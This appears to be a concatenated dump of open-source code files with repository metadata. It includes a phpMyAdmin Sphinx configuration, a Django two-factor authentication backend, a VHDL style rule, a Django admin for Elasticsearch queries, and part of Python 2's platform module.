# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'phpMyAdmindoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'phpMyAdmin.tex', u'phpMyAdmin Documentation',
u'The phpMyAdmin devel team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'phpmyadmin', u'phpMyAdmin Documentation',
[u'The phpMyAdmin devel team'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'phpMyAdmin', u'phpMyAdmin Documentation',
u'The phpMyAdmin devel team', 'phpMyAdmin', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'phpMyAdmin'
epub_author = u'The phpMyAdmin devel team'
epub_publisher = u'The phpMyAdmin devel team'
epub_copyright = copyright
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Highlight PHP without starting <?php tag
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer
lexers['php'] = PhpLexer(startinline=True)
|
gpl-2.0
| -7,684,980,086,626,668,000
| 30.809211
| 82
| 0.709824
| false
| 3.704981
| true
| false
| false
|
ptone/django-duo-auth
|
duo_auth/backends.py
|
1
|
1061
|
import datetime
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.models import User
from duo_auth.models import VerificationDetails
class auth_backend(ModelBackend):
supports_object_permissions = False
supports_anonymous_user = False
supports_inactive_user = False
def authenticate(self, username=None, password=None, passcode=None):
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
return None
if not user.check_password(password):
return None
try:
verification_details = user.two_factor_details
except VerificationDetails.DoesNotExist:
# for users that don't have verification details available
# log them in regularly
return user
if passcode == verification_details.challenge_passcode:
verification_details.last_verified = datetime.datetime.utcnow()
verification_details.save()
return user
return None
|
mit
| -7,481,110,555,969,955,000
| 30.205882
| 75
| 0.66918
| false
| 4.866972
| false
| false
| false
|
jeremiah-c-leary/vhdl-style-guide
|
vsg/rules/single_space_between_tokens.py
|
1
|
1864
|
from vsg import parser
from vsg import rule
from vsg import violation
from vsg.rules import utils as rules_utils
from vsg.vhdlFile import utils
class single_space_between_tokens(rule.Rule):
'''
Checks for a single space between two tokens.
Parameters
----------
name : string
The group the rule belongs to.
identifier : string
unique identifier. Usually in the form of 00N.
left_token : token object
The left token to check for a space between the right token
right_token : token object
The right token to check for a space between the left token
'''
def __init__(self, name, identifier, left_token, right_token):
rule.Rule.__init__(self, name=name, identifier=identifier)
self.solution = None
self.phase = 2
self.left_token = left_token
self.right_token = right_token
def _get_tokens_of_interest(self, oFile):
lToi_a = oFile.get_sequence_of_tokens_matching([self.left_token, parser.whitespace, self.right_token])
lToi_b = oFile.get_sequence_of_tokens_matching([self.left_token, self.right_token])
return utils.combine_two_token_class_lists(lToi_a, lToi_b)
def _analyze(self, lToi):
for oToi in lToi:
lTokens = oToi.get_tokens()
if len(lTokens) == 2:
self.add_violation(violation.New(oToi.get_line_number(), oToi, self.solution))
elif len(lTokens[1].get_value()) != 1:
self.add_violation(violation.New(oToi.get_line_number(), oToi, self.solution))
def _fix_violation(self, oViolation):
lTokens = oViolation.get_tokens()
if isinstance(lTokens[1], parser.whitespace):
lTokens[1].set_value(' ')
else:
rules_utils.insert_whitespace(lTokens, 1)
oViolation.set_tokens(lTokens)
|
gpl-3.0
| 8,277,113,610,826,553,000
| 30.59322
| 110
| 0.637876
| false
| 3.550476
| false
| false
| false
|
yunojuno/elasticsearch-django
|
elasticsearch_django/admin.py
|
1
|
3501
|
import logging
import simplejson as json # simplejson supports Decimal serialization
from django.contrib import admin
from django.template.defaultfilters import truncatechars, truncatewords
from django.utils.safestring import mark_safe
from .models import SearchQuery
logger = logging.getLogger(__name__)
def pprint(data: dict) -> str:
"""
Return an indented HTML pretty-print version of JSON.
Take the event_payload JSON, indent it, order the keys and then
present it as a <code> block. That's about as good as we can get
until someone builds a custom syntax function.
"""
pretty = json.dumps(data, sort_keys=True, indent=4, separators=(",", ": "))
html = pretty.replace(" ", " ").replace("\n", "<br>")
return mark_safe("<code>%s</code>" % html)
class SearchQueryAdmin(admin.ModelAdmin):
list_display = (
"id",
"user",
"search_terms_display",
"total_hits_display",
"returned_",
"min_",
"max_",
"reference",
"executed_at",
)
list_filter = ("index", "query_type")
search_fields = ("search_terms", "user__first_name", "user__last_name", "reference")
# excluding because we are using a pretty version instead
exclude = ("hits", "aggregations", "query", "page", "total_hits_")
readonly_fields = (
"user",
"index",
"search_terms",
"query_type",
"total_hits",
"total_hits_relation",
"returned_",
"min_",
"max_",
"duration",
"query_",
"hits_",
"aggregations_",
"executed_at",
)
def search_terms_display(self, instance: SearchQuery) -> str:
"""Return truncated version of search_terms."""
raw = instance.search_terms
# take first five words, and further truncate to 50 chars if necessary
return truncatechars(truncatewords(raw, 5), 50)
def query_(self, instance: SearchQuery) -> str:
"""Return pretty version of query JSON."""
return pprint(instance.query)
def max_(self, instance: SearchQuery) -> str:
"""Return pretty version of max_score."""
return "-" if instance.page_size == 0 else str(instance.max_score)
max_.short_description = "Max score" # type: ignore
def min_(self, instance: SearchQuery) -> str:
"""Return pretty version of min_score."""
return "-" if instance.page_size == 0 else str(instance.min_score)
min_.short_description = "Min score" # type: ignore
def total_hits_display(self, instance: SearchQuery) -> str:
"""Return total hit count, annotated if lower bound."""
if instance.total_hits_relation == SearchQuery.TotalHitsRelation.ESTIMATE:
return f"{instance.total_hits}*"
return f"{instance.total_hits}"
def returned_(self, instance: SearchQuery) -> str:
"""Return number of hits returned in the page."""
if instance.page_size == 0:
return "-"
return "%i - %i" % (instance.page_from, instance.page_to)
returned_.short_description = "Page returned" # type: ignore
def hits_(self, instance: SearchQuery) -> str:
"""Return pretty version of hits JSON."""
return pprint(instance.hits)
def aggregations_(self, instance: SearchQuery) -> str:
"""Return pretty version of aggregations JSON."""
return pprint(instance.aggregations)
admin.site.register(SearchQuery, SearchQueryAdmin)
|
mit
| -1,682,509,719,301,585,000
| 32.028302
| 88
| 0.619823
| false
| 4.094737
| false
| false
| false
|
kubaszostak/gdal-dragndrop
|
osgeo/apps/Python27/Lib/platform.py
|
1
|
53234
|
#!/usr/bin/env python
""" This module tries to retrieve as much platform-identifying data as
possible. It makes this information available via function APIs.
If called from the command line, it prints the platform
information concatenated as single string to stdout. The output
format is useable as part of a filename.
"""
# This module is maintained by Marc-Andre Lemburg <mal@egenix.com>.
# If you find problems, please submit bug reports/patches via the
# Python bug tracker (http://bugs.python.org) and assign them to "lemburg".
#
# Note: Please keep this module compatible to Python 1.5.2.
#
# Still needed:
# * more support for WinCE
# * support for MS-DOS (PythonDX ?)
# * support for Amiga and other still unsupported platforms running Python
# * support for additional Linux distributions
#
# Many thanks to all those who helped adding platform-specific
# checks (in no particular order):
#
# Charles G Waldman, David Arnold, Gordon McMillan, Ben Darnell,
# Jeff Bauer, Cliff Crawford, Ivan Van Laningham, Josef
# Betancourt, Randall Hopper, Karl Putland, John Farrell, Greg
# Andruk, Just van Rossum, Thomas Heller, Mark R. Levinson, Mark
# Hammond, Bill Tutt, Hans Nowak, Uwe Zessin (OpenVMS support),
# Colin Kong, Trent Mick, Guido van Rossum, Anthony Baxter, Steve
# Dower
#
# History:
#
# <see CVS and SVN checkin messages for history>
#
# 1.0.8 - changed Windows support to read version from kernel32.dll
# 1.0.7 - added DEV_NULL
# 1.0.6 - added linux_distribution()
# 1.0.5 - fixed Java support to allow running the module on Jython
# 1.0.4 - added IronPython support
# 1.0.3 - added normalization of Windows system name
# 1.0.2 - added more Windows support
# 1.0.1 - reformatted to make doc.py happy
# 1.0.0 - reformatted a bit and checked into Python CVS
# 0.8.0 - added sys.version parser and various new access
# APIs (python_version(), python_compiler(), etc.)
# 0.7.2 - fixed architecture() to use sizeof(pointer) where available
# 0.7.1 - added support for Caldera OpenLinux
# 0.7.0 - some fixes for WinCE; untabified the source file
# 0.6.2 - support for OpenVMS - requires version 1.5.2-V006 or higher and
# vms_lib.getsyi() configured
# 0.6.1 - added code to prevent 'uname -p' on platforms which are
# known not to support it
# 0.6.0 - fixed win32_ver() to hopefully work on Win95,98,NT and Win2k;
# did some cleanup of the interfaces - some APIs have changed
# 0.5.5 - fixed another type in the MacOS code... should have
# used more coffee today ;-)
# 0.5.4 - fixed a few typos in the MacOS code
# 0.5.3 - added experimental MacOS support; added better popen()
# workarounds in _syscmd_ver() -- still not 100% elegant
# though
# 0.5.2 - fixed uname() to return '' instead of 'unknown' in all
# return values (the system uname command tends to return
# 'unknown' instead of just leaving the field empty)
# 0.5.1 - included code for slackware dist; added exception handlers
# to cover up situations where platforms don't have os.popen
# (e.g. Mac) or fail on socket.gethostname(); fixed libc
# detection RE
# 0.5.0 - changed the API names referring to system commands to *syscmd*;
# added java_ver(); made syscmd_ver() a private
# API (was system_ver() in previous versions) -- use uname()
# instead; extended the win32_ver() to also return processor
# type information
# 0.4.0 - added win32_ver() and modified the platform() output for WinXX
# 0.3.4 - fixed a bug in _follow_symlinks()
# 0.3.3 - fixed popen() and "file" command invokation bugs
# 0.3.2 - added architecture() API and support for it in platform()
# 0.3.1 - fixed syscmd_ver() RE to support Windows NT
# 0.3.0 - added system alias support
# 0.2.3 - removed 'wince' again... oh well.
# 0.2.2 - added 'wince' to syscmd_ver() supported platforms
# 0.2.1 - added cache logic and changed the platform string format
# 0.2.0 - changed the API to use functions instead of module globals
# since some action take too long to be run on module import
# 0.1.0 - first release
#
# You can always get the latest version of this module at:
#
# http://www.egenix.com/files/python/platform.py
#
# If that URL should fail, try contacting the author.
__copyright__ = """
Copyright (c) 1999-2000, Marc-Andre Lemburg; mailto:mal@lemburg.com
Copyright (c) 2000-2010, eGenix.com Software GmbH; mailto:info@egenix.com
Permission to use, copy, modify, and distribute this software and its
documentation for any purpose and without fee or royalty is hereby granted,
provided that the above copyright notice appear in all copies and that
both that copyright notice and this permission notice appear in
supporting documentation or portions thereof, including modifications,
that you make.
EGENIX.COM SOFTWARE GMBH DISCLAIMS ALL WARRANTIES WITH REGARD TO
THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
WITH THE USE OR PERFORMANCE OF THIS SOFTWARE !
"""
__version__ = '1.0.7'
import sys,string,os,re
### Globals & Constants
# Determine the platform's /dev/null device
try:
DEV_NULL = os.devnull
except AttributeError:
# os.devnull was added in Python 2.4, so emulate it for earlier
# Python versions
if sys.platform in ('dos','win32','win16','os2'):
# Use the old CP/M NUL as device name
DEV_NULL = 'NUL'
else:
# Standard Unix uses /dev/null
DEV_NULL = '/dev/null'
### Platform specific APIs
_libc_search = re.compile(r'(__libc_init)'
'|'
'(GLIBC_([0-9.]+))'
'|'
'(libc(_\w+)?\.so(?:\.(\d[0-9.]*))?)')
def libc_ver(executable=sys.executable,lib='',version='',
chunksize=2048):
""" Tries to determine the libc version that the file executable
(which defaults to the Python interpreter) is linked against.
Returns a tuple of strings (lib,version) which default to the
given parameters in case the lookup fails.
Note that the function has intimate knowledge of how different
libc versions add symbols to the executable and thus is probably
only useable for executables compiled using gcc.
The file is read and scanned in chunks of chunksize bytes.
"""
if hasattr(os.path, 'realpath'):
# Python 2.2 introduced os.path.realpath(); it is used
# here to work around problems with Cygwin not being
# able to open symlinks for reading
executable = os.path.realpath(executable)
f = open(executable,'rb')
binary = f.read(chunksize)
pos = 0
while 1:
m = _libc_search.search(binary,pos)
if not m:
binary = f.read(chunksize)
if not binary:
break
pos = 0
continue
libcinit,glibc,glibcversion,so,threads,soversion = m.groups()
if libcinit and not lib:
lib = 'libc'
elif glibc:
if lib != 'glibc':
lib = 'glibc'
version = glibcversion
elif glibcversion > version:
version = glibcversion
elif so:
if lib != 'glibc':
lib = 'libc'
if soversion and soversion > version:
version = soversion
if threads and version[-len(threads):] != threads:
version = version + threads
pos = m.end()
f.close()
return lib,version
def _dist_try_harder(distname,version,id):
""" Tries some special tricks to get the distribution
information in case the default method fails.
Currently supports older SuSE Linux, Caldera OpenLinux and
Slackware Linux distributions.
"""
if os.path.exists('/var/adm/inst-log/info'):
# SuSE Linux stores distribution information in that file
info = open('/var/adm/inst-log/info').readlines()
distname = 'SuSE'
for line in info:
tv = string.split(line)
if len(tv) == 2:
tag,value = tv
else:
continue
if tag == 'MIN_DIST_VERSION':
version = string.strip(value)
elif tag == 'DIST_IDENT':
values = string.split(value,'-')
id = values[2]
return distname,version,id
if os.path.exists('/etc/.installed'):
# Caldera OpenLinux has some infos in that file (thanks to Colin Kong)
info = open('/etc/.installed').readlines()
for line in info:
pkg = string.split(line,'-')
if len(pkg) >= 2 and pkg[0] == 'OpenLinux':
# XXX does Caldera support non Intel platforms ? If yes,
# where can we find the needed id ?
return 'OpenLinux',pkg[1],id
if os.path.isdir('/usr/lib/setup'):
# Check for slackware version tag file (thanks to Greg Andruk)
verfiles = os.listdir('/usr/lib/setup')
for n in range(len(verfiles)-1, -1, -1):
if verfiles[n][:14] != 'slack-version-':
del verfiles[n]
if verfiles:
verfiles.sort()
distname = 'slackware'
version = verfiles[-1][14:]
return distname,version,id
return distname,version,id
_release_filename = re.compile(r'(\w+)[-_](release|version)')
_lsb_release_version = re.compile(r'(.+)'
' release '
'([\d.]+)'
'[^(]*(?:\((.+)\))?')
_release_version = re.compile(r'([^0-9]+)'
'(?: release )?'
'([\d.]+)'
'[^(]*(?:\((.+)\))?')
# See also http://www.novell.com/coolsolutions/feature/11251.html
# and http://linuxmafia.com/faq/Admin/release-files.html
# and http://data.linux-ntfs.org/rpm/whichrpm
# and http://www.die.net/doc/linux/man/man1/lsb_release.1.html
_supported_dists = (
'SuSE', 'debian', 'fedora', 'redhat', 'centos',
'mandrake', 'mandriva', 'rocks', 'slackware', 'yellowdog', 'gentoo',
'UnitedLinux', 'turbolinux')
def _parse_release_file(firstline):
# Default to empty 'version' and 'id' strings. Both defaults are used
# when 'firstline' is empty. 'id' defaults to empty when an id can not
# be deduced.
version = ''
id = ''
# Parse the first line
m = _lsb_release_version.match(firstline)
if m is not None:
# LSB format: "distro release x.x (codename)"
return tuple(m.groups())
# Pre-LSB format: "distro x.x (codename)"
m = _release_version.match(firstline)
if m is not None:
return tuple(m.groups())
# Unknown format... take the first two words
l = string.split(string.strip(firstline))
if l:
version = l[0]
if len(l) > 1:
id = l[1]
return '', version, id
def linux_distribution(distname='', version='', id='',
supported_dists=_supported_dists,
full_distribution_name=1):
""" Tries to determine the name of the Linux OS distribution name.
The function first looks for a distribution release file in
/etc and then reverts to _dist_try_harder() in case no
suitable files are found.
supported_dists may be given to define the set of Linux
distributions to look for. It defaults to a list of currently
supported Linux distributions identified by their release file
name.
If full_distribution_name is true (default), the full
distribution read from the OS is returned. Otherwise the short
name taken from supported_dists is used.
Returns a tuple (distname,version,id) which default to the
args given as parameters.
"""
try:
etc = os.listdir('/etc')
except os.error:
# Probably not a Unix system
return distname,version,id
etc.sort()
for file in etc:
m = _release_filename.match(file)
if m is not None:
_distname,dummy = m.groups()
if _distname in supported_dists:
distname = _distname
break
else:
return _dist_try_harder(distname,version,id)
# Read the first line
f = open('/etc/'+file, 'r')
firstline = f.readline()
f.close()
_distname, _version, _id = _parse_release_file(firstline)
if _distname and full_distribution_name:
distname = _distname
if _version:
version = _version
if _id:
id = _id
return distname, version, id
# To maintain backwards compatibility:
def dist(distname='',version='',id='',
supported_dists=_supported_dists):
""" Tries to determine the name of the Linux OS distribution name.
The function first looks for a distribution release file in
/etc and then reverts to _dist_try_harder() in case no
suitable files are found.
Returns a tuple (distname,version,id) which default to the
args given as parameters.
"""
return linux_distribution(distname, version, id,
supported_dists=supported_dists,
full_distribution_name=0)
class _popen:
""" Fairly portable (alternative) popen implementation.
This is mostly needed in case os.popen() is not available, or
doesn't work as advertised, e.g. in Win9X GUI programs like
PythonWin or IDLE.
Writing to the pipe is currently not supported.
"""
tmpfile = ''
pipe = None
bufsize = None
mode = 'r'
def __init__(self,cmd,mode='r',bufsize=None):
if mode != 'r':
raise ValueError,'popen()-emulation only supports read mode'
import tempfile
self.tmpfile = tmpfile = tempfile.mktemp()
os.system(cmd + ' > %s' % tmpfile)
self.pipe = open(tmpfile,'rb')
self.bufsize = bufsize
self.mode = mode
def read(self):
return self.pipe.read()
def readlines(self):
if self.bufsize is not None:
return self.pipe.readlines()
def close(self,
remove=os.unlink,error=os.error):
if self.pipe:
rc = self.pipe.close()
else:
rc = 255
if self.tmpfile:
try:
remove(self.tmpfile)
except error:
pass
return rc
# Alias
__del__ = close
def popen(cmd, mode='r', bufsize=None):
""" Portable popen() interface.
"""
# Find a working popen implementation preferring win32pipe.popen
# over os.popen over _popen
popen = None
if os.environ.get('OS','') == 'Windows_NT':
# On NT win32pipe should work; on Win9x it hangs due to bugs
# in the MS C lib (see MS KnowledgeBase article Q150956)
try:
import win32pipe
except ImportError:
pass
else:
popen = win32pipe.popen
if popen is None:
if hasattr(os,'popen'):
popen = os.popen
# Check whether it works... it doesn't in GUI programs
# on Windows platforms
if sys.platform == 'win32': # XXX Others too ?
try:
popen('')
except os.error:
popen = _popen
else:
popen = _popen
if bufsize is None:
return popen(cmd,mode)
else:
return popen(cmd,mode,bufsize)
def _norm_version(version, build=''):
""" Normalize the version and build strings and return a single
version string using the format major.minor.build (or patchlevel).
"""
l = string.split(version,'.')
if build:
l.append(build)
try:
ints = map(int,l)
except ValueError:
strings = l
else:
strings = map(str,ints)
version = string.join(strings[:3],'.')
return version
_ver_output = re.compile(r'(?:([\w ]+) ([\w.]+) '
'.*'
'\[.* ([\d.]+)\])')
# Examples of VER command output:
#
# Windows 2000: Microsoft Windows 2000 [Version 5.00.2195]
# Windows XP: Microsoft Windows XP [Version 5.1.2600]
# Windows Vista: Microsoft Windows [Version 6.0.6002]
#
# Note that the "Version" string gets localized on different
# Windows versions.
def _syscmd_ver(system='', release='', version='',
supported_platforms=('win32','win16','dos','os2')):
""" Tries to figure out the OS version used and returns
a tuple (system,release,version).
It uses the "ver" shell command for this which is known
to exists on Windows, DOS and OS/2. XXX Others too ?
In case this fails, the given parameters are used as
defaults.
"""
if sys.platform not in supported_platforms:
return system,release,version
# Try some common cmd strings
for cmd in ('ver','command /c ver','cmd /c ver'):
try:
pipe = popen(cmd)
info = pipe.read()
if pipe.close():
raise os.error,'command failed'
# XXX How can I suppress shell errors from being written
# to stderr ?
except os.error,why:
#print 'Command %s failed: %s' % (cmd,why)
continue
except IOError,why:
#print 'Command %s failed: %s' % (cmd,why)
continue
else:
break
else:
return system,release,version
# Parse the output
info = string.strip(info)
m = _ver_output.match(info)
if m is not None:
system,release,version = m.groups()
# Strip trailing dots from version and release
if release[-1] == '.':
release = release[:-1]
if version[-1] == '.':
version = version[:-1]
# Normalize the version and build strings (eliminating additional
# zeros)
version = _norm_version(version)
return system,release,version
_WIN32_CLIENT_RELEASES = {
(5, 0): "2000",
(5, 1): "XP",
# Strictly, 5.2 client is XP 64-bit, but platform.py historically
# has always called it 2003 Server
(5, 2): "2003Server",
(5, None): "post2003",
(6, 0): "Vista",
(6, 1): "7",
(6, 2): "8",
(6, 3): "8.1",
(6, None): "post8.1",
(10, 0): "10",
(10, None): "post10",
}
# Server release name lookup will default to client names if necessary
_WIN32_SERVER_RELEASES = {
(5, 2): "2003Server",
(6, 0): "2008Server",
(6, 1): "2008ServerR2",
(6, 2): "2012Server",
(6, 3): "2012ServerR2",
(6, None): "post2012ServerR2",
}
def _get_real_winver(maj, min, build):
if maj < 6 or (maj == 6 and min < 2):
return maj, min, build
from ctypes import (c_buffer, POINTER, byref, create_unicode_buffer,
Structure, WinDLL, _Pointer)
from ctypes.wintypes import DWORD, HANDLE
class VS_FIXEDFILEINFO(Structure):
_fields_ = [
("dwSignature", DWORD),
("dwStrucVersion", DWORD),
("dwFileVersionMS", DWORD),
("dwFileVersionLS", DWORD),
("dwProductVersionMS", DWORD),
("dwProductVersionLS", DWORD),
("dwFileFlagsMask", DWORD),
("dwFileFlags", DWORD),
("dwFileOS", DWORD),
("dwFileType", DWORD),
("dwFileSubtype", DWORD),
("dwFileDateMS", DWORD),
("dwFileDateLS", DWORD),
]
class PVS_FIXEDFILEINFO(_Pointer):
_type_ = VS_FIXEDFILEINFO
kernel32 = WinDLL('kernel32')
version = WinDLL('version')
# We will immediately double the length up to MAX_PATH, but the
# path may be longer, so we retry until the returned string is
# shorter than our buffer.
name_len = actual_len = 130
while actual_len == name_len:
name_len *= 2
name = create_unicode_buffer(name_len)
actual_len = kernel32.GetModuleFileNameW(HANDLE(kernel32._handle),
name, len(name))
if not actual_len:
return maj, min, build
size = version.GetFileVersionInfoSizeW(name, None)
if not size:
return maj, min, build
ver_block = c_buffer(size)
if (not version.GetFileVersionInfoW(name, None, size, ver_block) or
not ver_block):
return maj, min, build
pvi = PVS_FIXEDFILEINFO()
if not version.VerQueryValueW(ver_block, "", byref(pvi), byref(DWORD())):
return maj, min, build
maj = pvi.contents.dwProductVersionMS >> 16
min = pvi.contents.dwProductVersionMS & 0xFFFF
build = pvi.contents.dwProductVersionLS >> 16
return maj, min, build
def win32_ver(release='', version='', csd='', ptype=''):
try:
from sys import getwindowsversion
except ImportError:
return release, version, csd, ptype
try:
from winreg import OpenKeyEx, QueryValueEx, CloseKey, HKEY_LOCAL_MACHINE
except ImportError:
from _winreg import OpenKeyEx, QueryValueEx, CloseKey, HKEY_LOCAL_MACHINE
winver = getwindowsversion()
maj, min, build = _get_real_winver(*winver[:3])
version = '{0}.{1}.{2}'.format(maj, min, build)
release = (_WIN32_CLIENT_RELEASES.get((maj, min)) or
_WIN32_CLIENT_RELEASES.get((maj, None)) or
release)
# getwindowsversion() reflect the compatibility mode Python is
# running under, and so the service pack value is only going to be
# valid if the versions match.
if winver[:2] == (maj, min):
try:
csd = 'SP{}'.format(winver.service_pack_major)
except AttributeError:
if csd[:13] == 'Service Pack ':
csd = 'SP' + csd[13:]
# VER_NT_SERVER = 3
if getattr(winver, 'product_type', None) == 3:
release = (_WIN32_SERVER_RELEASES.get((maj, min)) or
_WIN32_SERVER_RELEASES.get((maj, None)) or
release)
key = None
try:
key = OpenKeyEx(HKEY_LOCAL_MACHINE,
r'SOFTWARE\Microsoft\Windows NT\CurrentVersion')
ptype = QueryValueEx(key, 'CurrentType')[0]
except:
pass
finally:
if key:
CloseKey(key)
return release, version, csd, ptype
def _mac_ver_lookup(selectors,default=None):
from gestalt import gestalt
import MacOS
l = []
append = l.append
for selector in selectors:
try:
append(gestalt(selector))
except (RuntimeError, MacOS.Error):
append(default)
return l
def _bcd2str(bcd):
return hex(bcd)[2:]
def _mac_ver_gestalt():
"""
Thanks to Mark R. Levinson for mailing documentation links and
code examples for this function. Documentation for the
gestalt() API is available online at:
http://www.rgaros.nl/gestalt/
"""
# Check whether the version info module is available
try:
import gestalt
import MacOS
except ImportError:
return None
# Get the infos
sysv,sysa = _mac_ver_lookup(('sysv','sysa'))
# Decode the infos
if sysv:
major = (sysv & 0xFF00) >> 8
minor = (sysv & 0x00F0) >> 4
patch = (sysv & 0x000F)
if (major, minor) >= (10, 4):
# the 'sysv' gestald cannot return patchlevels
# higher than 9. Apple introduced 3 new
# gestalt codes in 10.4 to deal with this
# issue (needed because patch levels can
# run higher than 9, such as 10.4.11)
major,minor,patch = _mac_ver_lookup(('sys1','sys2','sys3'))
release = '%i.%i.%i' %(major, minor, patch)
else:
release = '%s.%i.%i' % (_bcd2str(major),minor,patch)
if sysa:
machine = {0x1: '68k',
0x2: 'PowerPC',
0xa: 'i386'}.get(sysa,'')
versioninfo=('', '', '')
return release,versioninfo,machine
def _mac_ver_xml():
fn = '/System/Library/CoreServices/SystemVersion.plist'
if not os.path.exists(fn):
return None
try:
import plistlib
except ImportError:
return None
pl = plistlib.readPlist(fn)
release = pl['ProductVersion']
versioninfo=('', '', '')
machine = os.uname()[4]
if machine in ('ppc', 'Power Macintosh'):
# for compatibility with the gestalt based code
machine = 'PowerPC'
return release,versioninfo,machine
def mac_ver(release='',versioninfo=('','',''),machine=''):
""" Get MacOS version information and return it as tuple (release,
versioninfo, machine) with versioninfo being a tuple (version,
dev_stage, non_release_version).
Entries which cannot be determined are set to the parameter values
which default to ''. All tuple entries are strings.
"""
# First try reading the information from an XML file which should
# always be present
info = _mac_ver_xml()
if info is not None:
return info
# If that doesn't work for some reason fall back to reading the
# information using gestalt calls.
info = _mac_ver_gestalt()
if info is not None:
return info
# If that also doesn't work return the default values
return release,versioninfo,machine
def _java_getprop(name,default):
from java.lang import System
try:
value = System.getProperty(name)
if value is None:
return default
return value
except AttributeError:
return default
def java_ver(release='',vendor='',vminfo=('','',''),osinfo=('','','')):
""" Version interface for Jython.
Returns a tuple (release,vendor,vminfo,osinfo) with vminfo being
a tuple (vm_name,vm_release,vm_vendor) and osinfo being a
tuple (os_name,os_version,os_arch).
Values which cannot be determined are set to the defaults
given as parameters (which all default to '').
"""
# Import the needed APIs
try:
import java.lang
except ImportError:
return release,vendor,vminfo,osinfo
vendor = _java_getprop('java.vendor', vendor)
release = _java_getprop('java.version', release)
vm_name, vm_release, vm_vendor = vminfo
vm_name = _java_getprop('java.vm.name', vm_name)
vm_vendor = _java_getprop('java.vm.vendor', vm_vendor)
vm_release = _java_getprop('java.vm.version', vm_release)
vminfo = vm_name, vm_release, vm_vendor
os_name, os_version, os_arch = osinfo
os_arch = _java_getprop('java.os.arch', os_arch)
os_name = _java_getprop('java.os.name', os_name)
os_version = _java_getprop('java.os.version', os_version)
osinfo = os_name, os_version, os_arch
return release, vendor, vminfo, osinfo
### System name aliasing
def system_alias(system,release,version):
""" Returns (system,release,version) aliased to common
marketing names used for some systems.
It also does some reordering of the information in some cases
where it would otherwise cause confusion.
"""
if system == 'Rhapsody':
# Apple's BSD derivative
# XXX How can we determine the marketing release number ?
return 'MacOS X Server',system+release,version
elif system == 'SunOS':
# Sun's OS
if release < '5':
# These releases use the old name SunOS
return system,release,version
# Modify release (marketing release = SunOS release - 3)
l = string.split(release,'.')
if l:
try:
major = int(l[0])
except ValueError:
pass
else:
major = major - 3
l[0] = str(major)
release = string.join(l,'.')
if release < '6':
system = 'Solaris'
else:
# XXX Whatever the new SunOS marketing name is...
system = 'Solaris'
elif system == 'IRIX64':
# IRIX reports IRIX64 on platforms with 64-bit support; yet it
# is really a version and not a different platform, since 32-bit
# apps are also supported..
system = 'IRIX'
if version:
version = version + ' (64bit)'
else:
version = '64bit'
